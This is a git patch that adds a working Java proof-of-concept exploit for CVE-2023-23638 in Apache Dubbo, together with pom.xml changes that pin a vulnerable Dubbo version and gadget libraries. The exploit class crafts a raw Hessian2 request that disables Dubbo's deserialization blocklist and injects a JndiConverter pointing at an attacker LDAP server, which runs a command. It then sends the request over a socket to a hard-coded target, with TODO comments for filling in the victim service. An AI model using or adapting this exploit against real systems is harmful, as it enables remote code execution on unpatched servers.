From d000035d9b89b5594896aa2d6b67023f7c3d11e9 Mon Sep 17 00:00:00 2001
From: lz2y <1446174588@qq.com>
Date: Mon, 27 Mar 2023 19:59:27 +0800
Subject: [PATCH] add CVE-2023-23638

---
 pom.xml                                      |  26 ++++-
 src/main/java/top/lz2y/vul/CVE202323638.java | 116 +++++++++++++++++++
 2 files changed, 139 insertions(+), 3 deletions(-)
 create mode 100644 src/main/java/top/lz2y/vul/CVE202323638.java

diff --git a/pom.xml b/pom.xml
index d793506..fe9564d 100644
--- a/pom.xml
+++ b/pom.xml
@@ -9,9 +9,9 @@
     <version>1.0-SNAPSHOT</version>
 
     <properties>
-        <source.level>1.8</source.level>
-        <target.level>1.8</target.level>
-        <dubbo.version>2.7.9</dubbo.version>
+        <source.level>1.7</source.level>
+        <target.level>1.7</target.level>
+        <dubbo.version>2.7.20</dubbo.version>
         <spring.version>4.3.16.RELEASE</spring.version>
         <junit.version>4.12</junit.version>
     </properties>
@@ -38,6 +38,13 @@
                 <version>${dubbo.version}</version>
                 <type>pom</type>
             </dependency>
+
+            <!-- https://mvnrepository.com/artifact/org.apache.dubbo/dubbo-common -->
+            <dependency>
+                <groupId>org.apache.dubbo</groupId>
+                <artifactId>dubbo-common</artifactId>
+                <version>${dubbo.version}</version>
+            </dependency>
             <dependency>
                 <groupId>com.fasterxml.jackson.core</groupId>
                 <artifactId>jackson-databind</artifactId>
@@ -64,6 +71,7 @@
         <dependency>
             <groupId>org.apache.dubbo</groupId>
             <artifactId>dubbo</artifactId>
+            <version>${dubbo.version}</version>
         </dependency>
 
         <dependency>
@@ -146,6 +154,18 @@
             <version>4.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>io.netty</groupId>
+            <artifactId>netty-all</artifactId>
+            <version>4.1.60.Final</version>
+        </dependency>
+
+        <dependency>
+            <groupId>de.ruedigermoeller</groupId>
+            <artifactId>fst</artifactId>
+            <version>2.47</version>
+        </dependency>
+
     </dependencies>
 
 
diff --git a/src/main/java/top/lz2y/vul/CVE202323638.java b/src/main/java/top/lz2y/vul/CVE202323638.java
new file mode 100644
index 0000000..cf85afc
--- /dev/null
+++ b/src/main/java/top/lz2y/vul/CVE202323638.java
@@ -0,0 +1,116 @@
+package top.lz2y.vul;
+
+import org.apache.dubbo.common.beanutil.JavaBeanDescriptor;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
+import org.apache.dubbo.common.utils.ConcurrentHashSet;
+import org.apache.dubbo.common.utils.PojoUtils;
+import org.apache.dubbo.common.utils.SerializeClassChecker;
+import top.lz2y.tools.FileUtil;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.OutputStream;
+import java.lang.reflect.Field;
+import java.net.Socket;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Random;
+
+
+/**
+ * 漏洞编号:
+ *      CVE-2023-23638
+ * 适用版本:
+ *      Apache Dubbo 2.7.0 to 2.7.21
+ *      Apache Dubbo 3.0.x to 3.0.13
+ *      Apache Dubbo 3.1.x to 3.1.5
+ */
+public class CVE202323638 {
+    public static void main(String[] args) throws Exception{
+
+        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+        // header.
+        byte[] header = new byte[16];
+        // set magic number.
+        Bytes.short2bytes((short) 0xdabb, header);
+        // set request and serialization flag.
+        header[2] = (byte) ((byte) 0x80 | 2);
+
+        // set request id.
+        Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+        ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+        Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+
+        // set body
+        out.writeUTF("2.7.21");
+            //todo 此处填写Dubbo提供的服务名
+        out.writeUTF("top.lz2y.service.DemoService");
+        out.writeUTF("");
+        out.writeUTF("$invoke");
+        out.writeUTF("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;");
+            //todo 此处填写Dubbo提供的服务的方法
+        out.writeUTF("sayHello");
+        out.writeObject(new String[] {"java.lang.String"});
+
+        // Step-1
+//        getBypassPayload(out);
+
+        // Step-2
+            // POC 1: raw.return
+        getRawReturnPayload(out, "ldap://127.0.0.1:8072/wNfSybNGMm/Plain/Exec/eyJjbWQiOiJjYWxjIn0=");
+            // POC 2: bean
+//        getBeanPayload(out, "ldap://127.0.0.1:8072/wNfSybNGMm/Plain/Exec/eyJjbWQiOiJjYWxjIn0=");
+
+        out.flushBuffer();
+
+        Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+        byteArrayOutputStream.write(header);
+        byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+        byte[] bytes = byteArrayOutputStream.toByteArray();
+
+        //todo 此处填写Dubbo服务地址及端口
+        Socket socket = new Socket("169.254.46.101", 20880);
+        OutputStream outputStream = socket.getOutputStream();
+        outputStream.write(bytes);
+        outputStream.flush();
+        outputStream.close();
+    }
+
+    private static void getBypassPayload(Hessian2ObjectOutput out) throws IOException {
+        HashMap<String, Object> instanceMap = new HashMap<>();
+        instanceMap.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker");
+        instanceMap.put("CLASS_DESERIALIZE_BLOCKED_SET", new ConcurrentHashSet<>());
+        HashMap<String, Object> scc = new HashMap<>();
+        scc.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker");
+        scc.put("INSTANCE", instanceMap);
+        out.writeObject(new Object[]{scc});
+
+        HashMap<String, Object> map = new HashMap<>();
+        map.put("generic", "raw.return");
+        out.writeObject(map);
+    }
+
+    private static void getRawReturnPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException {
+        HashMap<String, Object> jndi = new HashMap<>();
+        jndi.put("class", "org.apache.xbean.propertyeditor.JndiConverter");
+        jndi.put("asText", ldapUri);
+        out.writeObject(new Object[]{jndi});
+
+        HashMap<String, Object> map = new HashMap<>();
+        map.put("generic", "raw.return");
+        out.writeObject(map);
+    }
+
+    private static void getBeanPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException {
+        JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
+        javaBeanDescriptor.setProperty("asText",ldapUri);
+        out.writeObject(new Object[]{javaBeanDescriptor});
+        HashMap<String, Object> map = new HashMap<>();
+
+        map.put("generic", "bean");
+        out.writeObject(map);
+    }
+}